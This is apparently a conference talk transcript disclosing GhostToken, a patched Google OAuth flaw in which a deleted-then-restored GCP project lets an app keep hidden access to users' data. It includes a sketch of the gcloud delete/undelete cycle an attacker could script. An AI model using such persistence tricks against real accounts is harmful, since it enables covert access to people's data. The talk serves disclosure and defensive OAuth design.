So, hey, everyone. I'm very excited to be here. And for this talk, I hope you have nerves of steel, because today's story is a ghost story. OK, so this story is not your average ghost story. It's not about a haunted house or a deserted mental hospital. This one is scary for hackers specifically. It's about apps having invisible access to your Google account. So it all started a bit over a year ago, in June 2022. While I was playing around with Google apps, I discovered the GhostToken vulnerability, which basically allows attackers to create apps that are invisible while still having access to your Google account. And this vulnerability is pretty unique. It's not an XSS or a CSRF, and it doesn't fall into any of the cloud vulnerability categories either. I think that makes it especially interesting to understand why the vulnerability happened, and I think we have a lot to learn from it looking into the future, which is something we'll explore at the end of the story. So before we begin, a little bit about myself. My name is Tal, and in the past decade I was involved in hacking in all sorts of ways. In my previous job, I hacked vehicle computers on a daily basis. And in 2016, maybe it's finally time to confess, I was part of the team that broke Pokémon Go's anti-cheating system. I also have a master's degree in theoretical computer science. Right now, I work as a senior security researcher and team lead at Astrix Security, where, among other things, I look at how different providers implement machine-to-machine and non-human identity authorization. And these are my socials. Feel free to contact me; I'd be happy to talk about anything I did or about this talk. You can also approach me after the talk. OK, so we're finally ready to start our story. The GhostToken vulnerability is related to how Google designed and implemented an authorization framework named OAuth.
First, then, we need to understand what OAuth is, why it's needed, and how it works. So let me start by going into the past, to the year 2007, before OAuth existed. The first iPhone had just been released, as you can see here, and everyone wanted one. And whoever had one probably went and posted about it on Facebook. So enter a developer named Ann. Ann has a brilliant idea: she will create an app that scans your email contacts and looks for them on Facebook, so you can connect to each other and brag about having an iPhone. So she creates an app. You give this app your email address and your password, and it scans your contacts. Great. Yeah, what? So actually, this is how the world looked without OAuth. If you wanted to use any third-party application and give it access to your Google account, you actually needed to give it your email address and your password. And I guess we were fine with it. Today it's probably pretty clear to you why this is not very good, but let me state the glaring issues. The first one: even when the app only needed partial access to your account, for instance, in Ann's case, it only needed access to your contacts, it actually got full access to your Google account. The second problem: if you wanted to remove access to this app after you used it, you needed to change your password. That was the only way you could get rid of it. But then all the other apps you gave access to also lost access. The third point: most people, especially back then, probably used the same password for their online banking accounts. So you don't want to go around and give your password to just anyone. And this is where OAuth comes in. In fact, the problem was identified in 2006, and a working group was created to solve it, which released a final draft of the Open Authorization protocol, shortened to OAuth. I'm just going to call it OAuth from now on. And three years later, the first version of OAuth was released as an RFC.
And in a very nice analogy, one of OAuth's co-creators, Eran Hammer, gives a brief outline of how OAuth works. Luxury cars today come with a special valet key. It's a special key that will not allow whoever has it to drive more than a few miles. Some valet keys will not open the trunk; others will block access to your on-board cell phone address book. And the idea here is very clever. You give someone a special key with limited access to your car, while using your regular key to unlock everything. This idea translates almost directly to OAuth. Actually, two years after the first version, the second version of OAuth was released as an RFC, greatly extending the use cases of OAuth and simplifying the protocol itself. And as you may notice, I highlighted that they decided to call it the OAuth framework. So as opposed to other protocols or standards, OAuth 2 lays out the basic foundation of how the protocol works, but it leaves a lot of decisions to the implementers of OAuth. And this, as you'll see in a few slides, was one of the main reasons the GhostToken vulnerability existed in the first place. Now is an excellent time to go back to the present. Today, let me tell you, OAuth is everywhere. Every time you see an app, machine-to-machine authorization, anything related to authorization without using a password, it is done based on OAuth 2. You also have public marketplaces offering millions of apps used by millions of people. Here you can see the Slack, Google, and Microsoft public marketplaces. OK, so now we know why we needed OAuth and how it's used, but let's see how it works. This is how the framework looks in a very simplified view. We have Ann, who hasn't aged a day since 2007, and now she wants to use OAuth to create her app. So the first thing she does is approach Google and register her app.
And Google, in return, gives Ann two values: a unique identifier called the client ID, which identifies her app, and a second, secret value. Now, some time later, a user named Vikram wants to use Ann's app. So Ann sends Vikram to Google alongside the client ID identifying her app and a list of permissions that the app needs to operate. Google, in response, shows Vikram what's called the consent page. It's a page where Vikram can see the name of the app, in this case, Example App, and the list of permissions that the app needs to operate. And Vikram has the ability to either consent to this authorization or not. Let's say that Vikram wants to use the app, and he consents. Then what happens is Google generates a one-time code and sends it through Vikram to Ann. As a final step, Ann takes this one-time code generated by Google, together with the secret value she got in the first step, approaches Google, and exchanges these two values for a token. And this token is used to access Vikram's data. So what happens is that Ann holds a special token with limited permissions to Vikram's account. In this case, the app only asked for the email address, so the token only has access to that. OK. So this is how OAuth is laid out in the framework. However, I'm actually going to focus not on this part of OAuth, but on the things that were left unsaid. I'm going to call them the OAuth missing pieces. There are two missing pieces, which were basically the source of the GhostToken vulnerability. The first one, I glanced over it very quickly, is the process of app registration. I just said Ann goes to Google, she registers an app, and everyone is happy. But in fact, this is how it is laid out in the RFC itself. Besides two technical things that Ann needs to provide Google, the last thing, which I think is the most important thing, the information about Ann and her app, is actually completely up to Google to decide how to implement.
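The flow above can be sketched in code. This is an illustrative sketch only: the two endpoint URLs are Google's documented OAuth 2.0 endpoints, but the client ID, secret, redirect URI, and code values are made-up placeholders, and nothing here sends a real request.

```python
from urllib.parse import urlencode

# Google's documented OAuth 2.0 endpoints.
AUTH_ENDPOINT = "https://accounts.google.com/o/oauth2/v2/auth"
TOKEN_ENDPOINT = "https://oauth2.googleapis.com/token"


def build_consent_url(client_id, redirect_uri, scopes):
    """The URL Ann sends Vikram to; Google shows the consent page here."""
    params = {
        "client_id": client_id,        # identifies Ann's app
        "redirect_uri": redirect_uri,  # where Google sends the one-time code
        "response_type": "code",       # ask for an authorization code
        "scope": " ".join(scopes),     # the permissions the app requests
    }
    return f"{AUTH_ENDPOINT}?{urlencode(params)}"


def build_token_request(client_id, client_secret, code, redirect_uri):
    """The body Ann POSTs to exchange the one-time code for a token."""
    return {
        "client_id": client_id,
        "client_secret": client_secret,  # the secret from registration
        "code": code,                    # the one-time code Google generated
        "grant_type": "authorization_code",
        "redirect_uri": redirect_uri,
    }
```

In a real app, the second dictionary would be POSTed to the token endpoint, and the JSON response would contain the access token with only the consented scopes.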
So the framework really doesn't deal with any of that, and there are many questions left unanswered here. Like, exactly what information is Ann required to provide when she registers her app? And maybe more importantly, what part of this information is verified and shown to Vikram when Vikram comes and wants to authorize the app? The second missing piece is the part I call the user app management feature. And you'll notice there's nothing from the RFC here, because the RFC doesn't talk about it at all. So let's say Vikram installs 10 different apps. Now Vikram wants to see a list of his apps, what permissions they got, and maybe remove their access. The RFC doesn't mention any of that, and doesn't even say whether this feature must be implemented. Most providers today do provide this management feature, and you have a list of apps whose access you can decide to remove. But there are still questions here. Like, what information is displayed? Can I see the last time the app accessed my data? Which data was accessed? And indeed, both of these questions and all the questions about app registration basically go unanswered in the RFC, leading to different providers implementing them very differently. There's a big gap in how each provider implemented these things. And for our case, for the GhostToken vulnerability, let's look at how Google decided to implement them. So, the app registration process used to be very simple. You would just go to Google, say hi, hello, my name is Tal, I want to register an app, and you would get the client ID and secret you needed. Everyone was happy. But about six years ago, Google made a change so that apps are contained inside a Google Cloud Platform project. So as a developer who wants to make a new app, the first thing you actually need to do is register for Google Cloud Platform, GCP, and then create a GCP project.
Once you have a GCP project, inside this project you can set up your consent screen, which means providing some values about your app, most of them optional. And then, only then, can you get the client ID and secret you needed. My guess is that Google made this move in order to sway developers into using one of the services contained inside GCP, since they already had to register there in order to create an app. So this is how app registration works today in Google. For the second missing piece, the management page for users, there is a designated settings page in your Google account on which you can see all the apps you've given access to and what kind of permissions you gave them. And you have the ability to remove their access. It's important to know, for the rest of the talk, that there is no other place in which you can manage apps. This is the sole page where you can see all the apps you've given access to and can remove them. If you want, you can scan this QR code, go to your settings page, and see all the apps you've given access to. But if you don't really like scanning QR codes, I also provided an image of how this page looks. You can see a number of apps I've given access to, and if I click on one of these apps, I can see the permissions I gave it. For instance, this AI mail assistant has access to my email but doesn't have access to my Drive. And I also have a button I can click to remove the access of this app. OK, so we've seen why we need OAuth, how it works, the missing pieces of OAuth, and how they were implemented in Google. Now we're finally ready to see some ghosts. So the discovery of the GhostToken vulnerability happened like many other vulnerabilities: it was very unexpected. At my job, we do routine analysis of the Google environments of different customers. And at one customer, we noticed something weird.
We noticed an app whose name had suddenly changed to be its identifier. Usually we see app names that are human-readable, and suddenly it had changed to the same thing as the unique ID given to the app. We didn't really know what happened, but we speculated that this happens when the app is deleted by its developer: the Google backend gets confused, doesn't know where to take the app name from, and defaults to the ID. So we tested it, like good researchers do. We created a GCP project, created an app within it, and installed it for some test users. And then we went into this project and deleted the client ID we had generated for this app. And once we did, the following things happened. First, the name of the app became its client ID, so we were able to reproduce this weirdness. But, again, as good researchers do, we didn't stop there, and we tried to abuse this. We took the client ID we had just deleted and tried to use it, and we got this error, which says that the client ID is deleted. Also, all tokens previously given by Google authorizing the app stopped working. We couldn't use them anymore; the developer couldn't use them anymore. And the app disappeared from the management pages of all the users who had installed it. Now, you look at this and you say, well, that seems reasonable, right? The app is deleted; I expect it to be completely removed from everywhere it was. But I want you to recall that I said that today, with app registration in Google, when you create a client ID, it's actually contained within a GCP project. So this begs the question: what if, instead of deleting the client ID, we deleted the entire GCP project? So we went ahead and tried that. We took a GCP project that had an app inside it that some users had installed, and we deleted it. And once you delete a GCP project, it enters a special limbo state; they call it a pending deletion state.
And once the project was in the pending deletion state, the app contained within this project behaved similarly to when it was deleted directly. The client ID couldn't be used anymore, all tokens previously given to the app stopped working, and the app disappeared from the management pages of the users who had installed it. But as you can see in the image here, you have a button to restore projects. Once you delete a project in GCP, you have 30 days to regret your decision and actually restore it to its previous state. So what would happen to the tokens of the app if we restored the project? You might have guessed it or not, I don't know, but actually all tokens previously given to the app started working again once we restored the project. Do you notice the ghost? Let's recap what just happened. Let's say our developer from before, Ann, decided to turn evil and become an attacker, so we call her Evil Ann. And let's say Vikram installs one of Ann's apps. Now Ann combines two facts: once she deletes the project associated with the app, the user Vikram can't see the app anymore or remove its access; but when Ann restores the project associated with the app, the token belonging to Vikram starts working again and Ann can access Vikram's data. So what she can do is keep the project in a pending deletion state, and whenever she wants to access Vikram's data, she restores it, accesses the data, and then deletes it again. So Vikram can't remove her app. In essence, Ann holds some kind of a ghost token to Vikram's data that Vikram cannot get rid of. Now, you can relax, the vulnerability is patched now; I will talk about it in a few slides. But unfortunately it means there's no live demo. I did pre-record a demo of me exploiting this on a victim account, so let's see it. Here we have a victim who is convinced to install my totally innocent app, and I promise you it was totally innocent at the time.
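To make the recap concrete, here is a hypothetical sketch of Evil Ann's access cycle, expressed as the gcloud CLI commands an attacker could have scripted before the patch. The project ID is a made-up placeholder, and the commands are only assembled as lists here, not executed.

```python
# Sketch of the "ghost token" cycle against a pre-patch Google account.
# Assumption: the attacker's OAuth client lives inside the GCP project
# "totally-innocent-app" (a made-up name), currently in pending deletion.

def ghost_token_cycle(project_id):
    """One access cycle: undelete the project, use the token, delete again."""
    return [
        # Leave the 30-day pending-deletion limbo; previously issued
        # tokens start working again.
        ["gcloud", "projects", "undelete", project_id],
        # ...here the attacker uses the old access token to read data...
        # Put the project back into pending deletion, so the app vanishes
        # from the victim's management page again.
        ["gcloud", "projects", "delete", project_id, "--quiet"],
    ]


for cmd in ghost_token_cycle("totally-innocent-app"):
    print(" ".join(cmd))
```

The point of the sketch is how short the loop is: because the same token survives the delete/undelete round trip, the app only has to be visible for the brief moment of the actual data access.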
So this is how the consent screen looks, and the victim gives access to their Drive files. And once they do, this is the attacker's point of view. I immediately get the token belonging to the victim, and then I quickly run over to the GCP project associated with the app, and I delete it. Once I do, it enters the pending deletion state. And this can happen automatically; you can even write a two-line script that does it for you, so you don't have to do it manually if you're lazy like me. Let's go back to the victim's point of view. You can see this is the victim because of the V on the top right there. And this is the list of all the apps the victim has given access to. As you can notice, the totally innocent app is not present on this list. So the victim, at any point in time, cannot do anything about it. The victim can't even know that the app is installed on their account. But notice that this is back to the attacker's point of view: at any time I want, I can restore the GCP project that I deleted before, and then use the same token that I received before to access the user's Drive files. This is what happens here. And once we do that, immediately after getting the victim's files, we can shut down the project again and restore it to its pending deletion state, so the victim cannot remove it. OK. So we reported the vulnerability to Google when we discovered it, and we worked together on a fix, which wasn't simple, because it involved some deep infrastructural changes at Google. You can read more about what the patch did exactly to solve this vulnerability, as well as some details about the research that I didn't have time to go through here, in the blog post. Just search for GhostToken online and you'll find it. OK. So we've seen the GhostToken vulnerability; now let's discuss some takeaways.
First, the vulnerability, in my opinion, has probably existed ever since Google made the move to contain apps inside GCP, which happened around six years ago. And because the users' management page is so severely lacking in audit information about who accessed your data and when, it's basically impossible to know if someone exploited this vulnerability. Imagine that one of the developers of one of the millions of apps out there was bad and decided to exploit this vulnerability. Would we even notice? Would anyone know? There's no way to know, and I think this makes the threat potential of GhostToken pretty huge. We have no idea if it was ever exploited. The second takeaway: if you recall the two missing pieces, the fact that Google made apps contained inside a GCP project, together with the fact that there are not enough audit logs related to how apps access your data, these two mistakes together made the vulnerability happen. And these mistakes, I don't hold them against Google; they concern things that are not mentioned in the RFC at all. So maybe this is a message to you: if you're ever involved in implementing OAuth in your organization, you need to pay special attention to the things that are not written in the RFC, to how you implement them, and make sure there's no such vulnerability in them as well. The third point is directed at researchers in the cloud, which I think are most of you here. I've been doing things related to OAuth vulnerabilities for the past five years or so, and whenever I read information regarding OAuth vulnerabilities, it's always very confusing and convoluted. I hope this one was a bit clearer regarding OAuth, but I see many researchers shy away from looking at these areas of OAuth.
I think that because OAuth is just a framework and the implementation differs a lot between providers, it's actually a very rich surface for vulnerability research, and I implore you to look at it in your next research. To wrap up this talk, I would like to finally look into the future and give some sort of vision of how I see the next iteration of OAuth. The first thing I want to see is a change in how we register apps on different platforms. Today you need to go to each individual platform you want to make an app for, to GitHub, to Slack, to Google, et cetera, and register your app separately, and each of them has a completely separate way to verify information and handle the whole registration process. I imagine a consolidated, centralized platform where developers can register their app once and have it immediately available on all the platforms they want it to be on. Additionally, when they register, they can either be completely anonymous and give basically no information about their app, or maybe they're a very well-respected company that has no problem verifying a lot of information about themselves, and they can give all this information to this centralized platform. Of course, the important thing here is that when a user comes to authorize an app, all this information will be fully transparent and shown to the user, helping users make much better decisions when deciding whether to allow or deny access to the apps they want to use. The second part is about the user management page. Indeed, today all the providers that I've looked at provide a list of all the apps you've given access to and the ability to remove them. But I think that's still lacking. I, as a user, would like to know which app accessed my data, which data was accessed, and maybe more identifying details about the access, like IP address or user agent, so I can be more in control of where my data is and who is accessing it.
These two fixes, by the way, would also fix the problem behind the GhostToken vulnerability. The last part of the vision is a bit smaller. OAuth has many use cases in the RFC today, and even three years ago another use case was added. I think there are many use cases still present in the RFC that are a bit outdated, that nobody really uses anymore, and I would be happy to see them gone. I don't like backwards compatibility. Additionally, one of the most promising use cases that we see everywhere today is machine-to-machine authorization. Right now, people implementing machine-to-machine authorization use OAuth in some weird, backwards way, and I would be happy to see a specific use case in the RFC designed to lay the foundation of how machine-to-machine authorization works. So, to wrap up this talk, I presented a full overview of a unique vulnerability in Google's OAuth design. We analyzed how the insufficient OAuth framework was perhaps partly to blame for this bug, and finally we discussed some changes that we as a community should make to how OAuth works to prevent potentially catastrophic vulnerabilities like this in the future. Thank you all for listening. Have a good day.